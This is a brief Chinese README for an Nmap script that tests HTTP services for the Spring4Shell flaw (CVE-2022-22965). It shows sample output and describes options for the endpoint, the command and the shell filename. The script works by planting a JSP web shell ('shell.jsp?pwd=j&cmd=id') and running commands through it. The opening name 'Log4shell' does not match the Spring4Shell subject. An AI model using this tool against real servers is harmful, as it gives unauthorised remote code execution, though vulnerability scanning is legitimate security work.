Log4shell-nmap 是一个 NSE 脚本,用于检测 HTTP 服务中的 Spring4Shell RCE 漏洞(CVE-2022-22965)。该脚本将正确的负载注入应用程序,然后在指定的端点上执行以下命令。
请参见这里。
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
我们可以在脚本中使用多个变量。如下所示:
endpoint - 相对 URL。在 https://bugspace.pl/search/videos 上,它将为 /search/videos,command - 要在服务器上运行的命令。默认命令为 id,assertion - 服务器响应中检查的字符串。默认断言为 uid,filename - 服务器上的文件名。更多信息请参见这里。默认文件名为 shell。与 Nmap 相同。参见 https://nmap.org/book/man-legal.html